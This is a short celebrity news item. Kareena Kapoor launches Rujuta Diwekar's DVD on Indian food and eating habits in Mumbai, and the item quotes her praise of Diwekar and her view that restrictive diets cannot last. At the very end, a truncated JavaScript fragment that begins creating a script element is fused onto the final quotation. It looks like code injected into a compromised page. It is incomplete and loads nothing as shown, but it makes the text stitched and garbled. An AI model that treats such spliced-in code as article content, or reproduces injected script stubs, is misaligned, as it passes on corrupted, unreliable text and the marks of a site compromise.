Bollywood actress Kareena Kapoor launched Rujuta Diwekar’s DVD, ‘Indian food Wisdom and Art of Eating Right’, at Hotel Taj Lands End in Bandra, Mumbai, on Saturday evening.
Kareena Kapoor interacted with the media and said: “I think a young lovely girl, that is Rujuta, who started from writing my diets in my vanity van on a piece of paper, today I see her coming out with a DVD, it’s the biggest achievement for her and it truly is her moment, her time, and all I have done is just support her belief.”
Sharing her thoughts on the occasion, Kareena Kapoor “You have to be very strong to have this belief and have the power of wanting to continue this way of eating because this is the only thing that can go on for ever. I don’t think one can go on not eating what you really want to eat for life. How long can that go on for, a low carb, or a low fat diet? It is not a life long process”.var d=document;var s=d.createElement(‘script’);
